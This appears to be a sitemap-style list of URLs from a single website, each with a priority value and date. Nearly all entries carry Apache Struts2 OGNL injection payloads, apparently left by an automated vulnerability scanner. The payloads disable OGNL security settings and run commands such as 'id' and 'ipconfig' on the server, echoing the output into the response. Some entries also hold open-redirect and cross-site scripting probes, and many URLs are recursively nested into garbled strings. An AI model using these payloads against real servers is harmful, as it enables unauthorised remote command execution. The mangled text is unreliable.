http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3f=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?=%2578%2573%2573%2574%2565%2573%2574%2531%2539%2537 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?$%7b100002-1%2b'anonymous_'%2b'security_s2015_test'%7d.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm51372%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem55125?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27%5b%5d_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm43286%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem71659?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?=%2578%2573%2573%2574%2565%2573%2574%2537%2539%2537 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?$%7b100002-1%2b'anonymous_'%2b'security_s2015_test'%7d.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?=%3c23653a%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f=%2578%2573%2573%2574%2565%2573%2574%2537%2539%2537? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm35125%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem97619?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?=%3c7b7507%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?$%7b100002-1%2b'anonymous_'%2b'security_s2015_test'%7d.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 